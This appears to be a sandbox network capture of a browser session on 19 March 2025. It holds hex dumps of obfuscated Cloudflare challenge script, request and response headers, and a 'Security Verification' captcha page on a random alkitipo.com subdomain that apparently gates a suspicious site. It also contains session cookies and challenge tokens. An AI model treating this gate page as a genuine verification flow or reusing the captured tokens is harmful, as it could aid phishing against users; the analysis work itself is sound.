                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 27 33 27 3a 44 5b 68 6a 28 39 37 33 29 5d 28 68 6a 28 38 38 33 29 2c 42 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 67 5b 68 6a 28 33 32 31 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 68 6a 28 33 32 31 29 5d 3d 4a 53 4f 4e 5b 68 6a 28 38 34 37 29 5d 28 67 5b 68 6a 28 33 32 31 29 5d 2c 4f 62 6a 65 63 74 5b 68 6a 28 31 39 37 29 5d 28 67 5b 68 6a 28 33 32 31 29 5d 29 29 3a 67 5b 68 6a 28 33 32 31 29 5d 3d 4a 53 4f 4e 5b 68 6a 28 38 34 37 29 5d 28 67 5b 68 6a 28 33 32 31 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 78 3d 28 76 3d 7b 7d 2c 76 5b 68 6a 28 31 36 30 38 29 5d 3d 67 2c 76 5b 68 6a 28 31 35 32 30 29 5d 3d 43 2c 76 2e 63 63 3d 68 2c 76 5b 68 6a 28 38 37 31 29 5d 3d 6e 2c 76 5b 68 6a 28 31 30 36 34 29
                                                                      Data Ascii: '3':D[hj(973)](hj(883),B);continue;case'4':g[hj(321)]instanceof Error?g[hj(321)]=JSON[hj(847)](g[hj(321)],Object[hj(197)](g[hj(321)])):g[hj(321)]=JSON[hj(847)](g[hj(321)]);continue;case'5':x=(v={},v[hj(1608)]=g,v[hj(1520)]=C,v.cc=h,v[hj(871)]=n,v[hj(1064)
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 39 37 38 29 5d 3d 68 6d 28 31 34 32 30 29 2c 6a 5b 68 6d 28 31 36 30 36 29 5d 3d 68 6d 28 35 38 33 29 2c 6b 3d 6a 2c 6c 3d 65 5b 68 6d 28 31 33 32 32 29 5d 28 29 2c 6d 3d 6b 5b 68 6d 28 31 36 30 36 29 5d 2c 6c 5b 68 6d 28 31 34 37 37 29 5d 28 6d 29 3e 2d 31 3f 76 6f 69 64 20 30 3a 28 6e 3d 7b 7d 2c 6e 5b 68 6d 28 38 38 34 29 5d 3d 65 2c 6e 5b 68 6d 28 31 36 34 38 29 5d 3d 66 2c 6e 5b 68 6d 28 31 35 35 35 29 5d 3d 67 2c 6e 5b 68 6d 28 37 39 35 29 5d 3d 68 2c 6e 5b 68 6d 28 33 32 31 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 68 6d 28 31 32 32 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 6e 29 7b 68 6e 3d 68 6d 2c 65 4d 5b 68 6e 28 31 32 36 32 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 6b 5b 68 6e 28 37 30 33 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 68 6d 28 31 32 32 36
                                                                      Data Ascii: 978)]=hm(1420),j[hm(1606)]=hm(583),k=j,l=e[hm(1322)](),m=k[hm(1606)],l[hm(1477)](m)>-1?void 0:(n={},n[hm(884)]=e,n[hm(1648)]=f,n[hm(1555)]=g,n[hm(795)]=h,n[hm(321)]=i,o=n,eM[hm(1226)](function(hn){hn=hm,eM[hn(1262)](o,undefined,k[hn(703)])},10),eM[hm(1226
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 74 75 72 6e 20 68 3e 69 7d 2c 64 5b 69 4b 28 31 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 65 3d 64 2c 66 3d 65 4d 5b 69 4b 28 31 38 33 29 5d 5b 69 4b 28 31 33 35 36 29 5d 7c 7c 31 65 34 2c 67 3d 67 30 28 29 2c 21 65 4d 5b 69 4b 28 33 31 39 29 5d 26 26 21 66 46 28 29 26 26 21 65 4d 5b 69 4b 28 32 33 33 29 5d 5b 69 4b 28 32 38 32 29 5d 26 26 65 5b 69 4b 28 31 33 31 38 29 5d 28 65 5b 69 4b 28 31 37 32 29 5d 28 67 2c 66 5a 29 2c 66 29 3f 66 6c 28 29 3a 66 6d 28 29 7d 2c 31 65 33 29 29 2c 67 33 3d 7b 7d 2c 67 33 5b 67 4a 28 32 38 32 29 5d 3d 21 5b 5d 2c 67 33 5b 67 4a 28 31 36 31 34 29 5d 3d 66 35 2c 67 33 5b 67 4a 28 31 31 38 35 29 5d 3d 66 52 2c 67 33 5b 67 4a 28 39 34 37 29 5d 3d 66 57 2c 67 33 5b 67 4a 28
                                                                      Data Ascii: turn h>i},d[iK(172)]=function(h,i){return h-i},e=d,f=eM[iK(183)][iK(1356)]||1e4,g=g0(),!eM[iK(319)]&&!fF()&&!eM[iK(233)][iK(282)]&&e[iK(1318)](e[iK(172)](g,fZ),f)?fl():fm()},1e3)),g3={},g3[gJ(282)]=![],g3[gJ(1614)]=f5,g3[gJ(1185)]=fR,g3[gJ(947)]=fW,g3[gJ(
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 3d 30 3b 6f 5b 6a 75 28 37 36 30 29 5d 28 48 2c 47 5b 6a 75 28 31 32 30 33 29 5d 29 3b 47 5b 48 5d 3d 3d 3d 47 5b 48 2b 31 5d 3f 47 5b 6a 75 28 35 31 30 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 6a 73 28 31 30 36 35 29 5d 5b 6a 73 28 38 39 38 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 6a 73 28 31 32 30 33 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 67 41 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 6f 5b 6a 73 28 35 38 37 29 5d 28 6a 73 28 31 30 37 39 29 2c 6f 5b 6a 73 28 31 30 31 38 29 5d 29 3f 28 61 31 5b 6a 73 28 31 38 33 29 5d 5b 6a 73 28 31 34 37 32 29 5d 3d 61 32 5b 6a 73 28 38 38 30 29 5d 28 29 2c 6f 5b 6a 73 28 34 31 34 29 5d 28 61 33 2c
                                                                      Data Ascii: =0;o[ju(760)](H,G[ju(1203)]);G[H]===G[H+1]?G[ju(510)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[js(1065)][js(898)](B),C=0;C<x[js(1203)];D=x[C],E=gA(g,h,D),B(E)?o[js(587)](js(1079),o[js(1018)])?(a1[js(183)][js(1472)]=a2[js(880)](),o[js(414)](a3,
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 30 29 5d 2c 27 70 49 78 6c 6f 31 27 3a 61 46 5b 6a 73 28 31 38 33 29 5d 5b 6a 73 28 31 34 33 33 29 5d 2c 27 78 79 5a 72 79 37 27 3a 61 47 5b 6a 73 28 31 38 33 29 5d 5b 6a 73 28 31 34 31 35 29 5d 7d 29 29 3a 28 46 3d 6f 5b 6a 73 28 35 38 37 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 6a 73 28 31 34 33 38 29 5d 28 68 5b 44 5d 29 2c 6a 73 28 31 30 37 36 29 3d 3d 3d 6f 5b 6a 73 28 31 31 34 32 29 5d 28 69 2c 44 29 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 6f 5b 6a 73 28 31 31 34 32 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 73 28 6f 5b 6a 73 28 31 31 34 32 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 6a 74 29 7b 6a 74 3d 6a 73 2c 4f 62 6a 65 63 74 5b 6a 74 28 33 33 31 29 5d 5b 6a 74
                                                                      Data Ascii: 0)],'pIxlo1':aF[js(183)][js(1433)],'xyZry7':aG[js(183)][js(1415)]})):(F=o[js(587)]('s',E)&&!g[js(1438)](h[D]),js(1076)===o[js(1142)](i,D)?s(i+D,E):F||s(o[js(1142)](i,D),h[D])):s(o[js(1142)](i,D),E),C++);return j;function s(G,H,jt){jt=js,Object[jt(331)][jt
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 75 6a 65 45 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 77 57 69 4b 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 52 69 63 58 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 68 6e 56 6c 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 7a 4c 67 55 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 79 49 49 76 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 76 6c 74 57 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c
                                                                      Data Ascii: T':function(h,i){return h(i)},'ujeEd':function(h,i){return h>i},'wWiKp':function(h,i){return h-i},'RicXR':function(h,i){return h(i)},'hnVlW':function(h,i){return h==i},'zLgUF':function(h,i){return i|h},'yIIvw':function(h,i){return h-i},'vltWJ':function(h,


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.649716104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC784OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:55 UTC240INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 61
                                                                      Connection: close
                                                                      cache-control: max-age=2629800, public
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9c1c7adbc7-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.649718104.21.5.1304431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC530OUTGET /cdn-cgi/challenge-platform/h/g/jsd/r/0.38274867399469387:1742376653:KH8maKPuUqiEMLR5OlzLIk_YKRD4m2JdO_m0T_WtFio/922c4a9648889f21 HTTP/1.1
                                                                      Host: a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:55 UTC819INHTTP/1.1 405 Method Not Allowed
                                                                      Date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      allow: POST
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1o%2BY4JGplPtjRKrCUDf1n5KY6V%2BVY9biWCrI4ZC%2FIcrQQ1vk1VyMWCxPBGGp1o3elrpjSy7yoi91aW8BrknNrpWJfCpkaeghCv4FkeuFl8%2BCG6%2BwJ%2FGDtpWrcanjjYK5nwWKVjxKgfsCsDiE17x7zLfv3q4xwNQj%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9e2d89dbfb-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=565&min_rtt=548&rtt_var=241&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1102&delivery_rate=4191027&cwnd=248&unsent_bytes=0&cid=706f30a3724a62ee&ts=71&x=0"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.649719104.21.5.1304431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC1088OUTGET /favicon.ico HTTP/1.1
                                                                      Host: a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Referer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Cookie: cf_clearance=qNs1iY1VvRH90Ldoq1yEk.IxYRRXaV.XjHDpBJskUl4-1742380194-1.2.1.1-6JCfidD2ac1ldlMQ_J35HHpOaB1R2Qfd77afpZZaY6L38WJnRgGF3HbJn2.e_YfjrnLq4AbcuviEtgLFLi6GxCSB8fAreovMFHBRH6Kx8RGKvrKCYyQfc8HfmhPxpGL2V7RM3EsgKJOLmnmy1Isw5_Vffq.FczWDL_75R6f2X0vx5NM4V4Bns8PxfX1tyunl3.moUgvDLgJ5359Rrbq327WTEaCVdGApZaHTZmOf2cDxSH5swKuN_8jCjL4biGArDXjPSayB0.RkwzX9HXl6OgpoNmb9_5CaiJINx7tyLyG9UPpR0yTi7d3NcTC9QiBUu0H7HmviVAp6BwdbyYbgI1CAcAcGxz7hqx4aE5i64jA
                                                                      2025-03-19 10:29:55 UTC880INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-store
                                                                      X-Content-Type-Options: nosniff
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mD%2FXRlKkEROVxwMP8f0emtCDg6BI6ISHIKO%2FRM01I9Rx3FXT9cG6sfMll2jjAPaw9%2BLk3i4yxJiS4vdeMx5oVLaK0Bz7cE%2B8Z3z3dm1PQsHP%2F7wXMpAH9UhUcoZ4xbYWSSedfK%2B0TzaAs2hSsP5njIV2oHn0g7JPTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9e3f2f6ae7-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=526&min_rtt=518&rtt_var=200&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1660&delivery_rate=5590733&cwnd=247&unsent_bytes=0&cid=a859c72ce559e5df&ts=73&x=0"
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 35 64 32 0d 0a 0a 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 53 65 63 75 72 69 74 79 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74
                                                                      Data Ascii: 5d2 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Security Verification</title> <script src="https://challenges.cloudflare.com/t
                                                                      2025-03-19 10:29:55 UTC128INData Raw: 74 63 68 61 43 6f 6d 70 6c 65 74 65 64 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 3f 63 66 5f 63 61 70 74 63 68 61 3d 76 65 72 69 66 69 65 64 22 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: tchaCompleted() { window.location.href = "?cf_captcha=verified"; } </script> </body> </html>
                                                                      2025-03-19 10:29:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.649723104.18.94.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC425OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:55 UTC240INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 61
                                                                      Connection: close
                                                                      cache-control: max-age=2629800, public
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9e78b118d2-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.64972435.190.80.14431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC607OUTOPTIONS /report/v4?s=1o%2BY4JGplPtjRKrCUDf1n5KY6V%2BVY9biWCrI4ZC%2FIcrQQ1vk1VyMWCxPBGGp1o3elrpjSy7yoi91aW8BrknNrpWJfCpkaeghCv4FkeuFl8%2BCG6%2BwJ%2FGDtpWrcanjjYK5nwWKVjxKgfsCsDiE17x7zLfv3q4xwNQj%2FA%3D%3D HTTP/1.1
                                                                      Host: a.nel.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Origin: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Access-Control-Request-Method: POST
                                                                      Access-Control-Request-Headers: content-type
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:55 UTC336INHTTP/1.1 200 OK
                                                                      Content-Length: 0
                                                                      access-control-max-age: 86400
                                                                      access-control-allow-methods: POST, OPTIONS
                                                                      access-control-allow-origin: *
                                                                      access-control-allow-headers: content-length, content-type
                                                                      date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Via: 1.1 google
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.649725104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC1190OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 3369
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      Content-Type: text/plain;charset=UTF-8
                                                                      cf-chl: bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT
                                                                      cf-chl-ra: 0
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Origin: https://challenges.cloudflare.com
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:55 UTC3369OUTData Raw: 63 32 6e 79 24 79 52 79 68 79 73 79 6f 66 57 47 66 57 51 79 66 4f 45 52 54 35 66 24 57 54 57 77 61 4f 7a 44 56 57 6a 75 57 75 4f 78 69 78 33 57 38 56 57 32 42 56 78 2b 69 42 57 24 56 75 46 78 5a 57 6b 4f 57 74 77 56 4e 4e 56 57 4e 7a 45 79 45 44 6e 76 79 7a 69 57 6d 44 62 57 57 55 31 37 65 66 74 57 6b 42 75 78 6b 57 32 69 59 77 57 68 63 6e 78 74 7a 57 24 68 34 6b 38 57 6b 68 45 75 69 68 38 6a 59 53 24 2d 36 5a 75 33 4f 37 57 78 47 65 57 33 56 57 6f 41 42 4e 63 66 4d 51 48 75 6e 57 72 57 57 34 4f 42 75 73 72 36 47 63 55 4e 42 7a 63 59 47 46 37 57 66 35 52 75 74 32 57 62 56 4e 42 45 57 4d 6a 57 75 41 6a 68 56 57 36 37 65 57 53 59 36 65 69 57 75 34 67 4e 79 78 31 69 47 34 52 43 6f 51 78 57 66 63 4b 38 62 65 4d 51 62 79 65 38 6c 72 52 63 75 32 4c 30 37 58 46
                                                                      Data Ascii: c2ny$yRyhysyofWGfWQyfOERT5f$WTWwaOzDVWjuWuOxix3W8VW2BVx+iBW$VuFxZWkOWtwVNNVWNzEyEDnvyziWmDbWWU17eftWkBuxkW2iYwWhcnxtzW$h4k8WkhEuih8jYS$-6Zu3O7WxGeW3VWoABNcfMQHunWrWW4OBusr6GcUNBzcYGF7Wf5Rut2WbVNBEWMjWuAjhVW67eWSY6eiWu4gNyx1iG4RCoQxWfcK8beMQbye8lrRcu2L07XF
                                                                      2025-03-19 10:29:55 UTC1071INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Content-Length: 239008
                                                                      Connection: close
                                                                      cf-chl-gen: zAszwLuvdbZ0+1G0tNaLfC6/RsLpb3F888djh56LOaj2XxiiPRAUsUiK3+9dqiT8wEtLsLj4UrgJK9N39iJSerQEooXQqGQ06XQ7I9dH9/jkVh9GotTK6cVrUkpMfZlWvCu+KVHM02Lm1aE2fqBnGDABTiZOysRsLx4iq08f19UrtWPtSuEwOHQosfB4zMcGGDWzmRFzwLu6XvRabSLvVMUZFGNZzo1BmPOn9jLl7HNEVYLS70ob1Vv6Lv8yPcwctEcnQq6WA/APGKfKIcBGj+KdTupWriCt0FUlZHZl6Pez6QdJhe5kKn3UkakjeN94uKHeNxgvHRQd5f4S8rndZ4J+12CkmDwVTw+lesDGU7KITM5Cp7t3A8ydoBb9YuBjZl7DEKkz72E9ip2+SZSezik2CuAVOMblhsw6FokZ3DGKiXbvWSjJsl54+BcHBnFUPaHOlJni2KlYkLffGC5rv+3lN7jYh8T3OnoXQMRZeAKZXuYe/6u5y0S5A39wPCgFOgsGpHIibQ/YGBqqse1Plc4Zr/RHM1KxaQvL8osZM0BvJpKeogl4vjwFPL7oL6y8Rr8npcpJN/Uf5IHaxrifXGQ+Ygu3rfIeXjQFQg2v5p5Kt/3yADK1zzummMA42HQMPmMUvvinrKhifwF4mvCgN/Mj3i45E9yK6KJmSsWVOJeDrFeSsE4WpvH0/9wTiaAzQHF+7qFv8T00S2cN7knbS80bAKlmDuHZFhNtN3Trdk3fvA4x2zjt/4eNtDB9R8KQ5Is78O37wYeIwVPjnZS24Duhn+lsqIdPmsLIX6j0xC0=$HAuDCM1utab7/pGPoh19yQ==
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9f0a2cb71e-FRA
                                                                      alt-svc: h3=":443"; ma=86400
